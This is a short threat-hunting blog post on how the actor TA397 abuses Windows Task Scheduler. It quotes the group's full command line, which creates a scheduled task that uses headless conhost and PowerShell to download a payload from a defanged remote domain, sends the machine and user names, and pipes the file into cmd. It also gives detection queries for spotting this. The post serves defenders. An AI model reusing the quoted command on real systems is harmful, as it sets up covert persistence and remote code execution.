158. Here's How TA397 Abuses Task Scheduler

Hello everyone!

Proofpoint in collaboration with Threatray released a report on TA397 activities. Threat researchers assess that it's a state-sponsored adversary with focus on intelligence gathering.

The threat actors actively abused task scheduler. A very common technique, but the command seemed interesting to me:

"C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping 

localhost > nul & schtasks /create /tn "EdgeTaskUI" /f /sc 

minute /mo 16 /tr "conhost --headless powershell -WindowStyle 

Minimized irm "woodstocktutors[.]com/jbc.php?

fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile 

"C:\\Users\\public\\kwe.cc"; Get-Content 

"C:\\Users\\public\\kwe.cc" | cmd"

Fisrt of all, the adversary extensively uses conhost.exe in "headless" mode, I'm sure you already have this hunt in your library:

event_type: "processcreatewin"

AND

proc_file_name: "conhost.exe"

AND

cmdline: "headless"

But more interesting is how the threat actors abused PowerShell. As you can see in the script, it downloads the payload from a remote server, reads its contents and pipes it to Windows Command Shell. And yes, we can use it for hunting:

event_type: "processcreatewin"

AND

proc_file_name: "powershell.exe"

AND

cmdline: ("get-content" AND "cmd")

See you tomorrow!

Comments

Popular posts from this blog

391. Hunting for TeamPCP's Stealer

343. Ransomware Gangs Abuse SystemSettingsAdminFlows to Evade Defenses

324. Adversaries Use HideMouse to Hide Evidence of Remote Access